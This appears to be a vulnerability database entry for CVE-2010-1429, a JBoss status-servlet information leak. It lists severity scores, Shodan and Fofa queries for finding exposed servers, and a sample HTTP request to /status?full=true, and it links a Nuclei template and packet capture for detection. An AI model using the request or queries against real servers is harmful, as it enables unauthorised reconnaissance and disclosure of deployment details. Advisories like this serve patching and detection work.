🔙 목록으로 돌아가기

CVE-2010-1429: Red Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure

TitleRed Hat JBoss Enterprise Application Platform - Sensitive Information Disclosure
AuthorR12W4N
SeverityMedium
ImpactAn attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
RemediationApply the necessary patches or updates provided by Red Hat to fix the vulnerability.
CVSS Score5
EPSS Score0.27359
CVE IDCVE-2010-1429
CWE IDCWE-264
Shodan Querytitle:"JBoss"cpe:"cpe:2.3:a:redhat:jboss_enterprise_application_platform"http.title:"jboss"
Fofa Querytitle="jboss"
Tags cve2010 cve jboss eap tomcat exposure redhat vuln

🔍 Vulnerability Description

Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about “deployed web contexts” via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.

🌐 HTTP Request

GET /status?full=true HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1429.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1429.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A